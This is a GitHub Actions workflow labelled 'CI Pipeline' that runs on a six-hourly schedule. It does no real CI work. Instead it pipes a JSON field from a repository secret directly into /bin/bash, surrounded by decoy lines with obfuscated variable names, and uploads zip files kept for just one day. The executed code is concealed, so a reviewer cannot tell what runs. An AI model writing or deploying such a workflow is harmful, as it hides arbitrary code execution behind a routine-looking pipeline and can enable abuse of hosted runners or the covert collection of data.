name: CI Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '51 2,8,14,20 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  trigger:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Start
        env:
          fr317: ${{ secrets.fr317 }}
        run: |
          printf '%s' "$fr317" | jq -r .vpwl700 | /bin/bash
          echo $zfw0 | jq -r .w0 | /bin/bash
          printf '%s' "$ekn04335" | jq -r .wkh8 | /bin/bash
          printf '%s' "$h5" | jq -r .kkt470 | /bin/bash
          echo $fqb11 | jq -r .ec4 | /bin/bash
          echo $m230 | jq -r .rmr37 | /bin/bash
          echo $nucx7 | jq -r .wabn4 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: l78XSpjj
          path: "*.zip"
          retention-days: 1
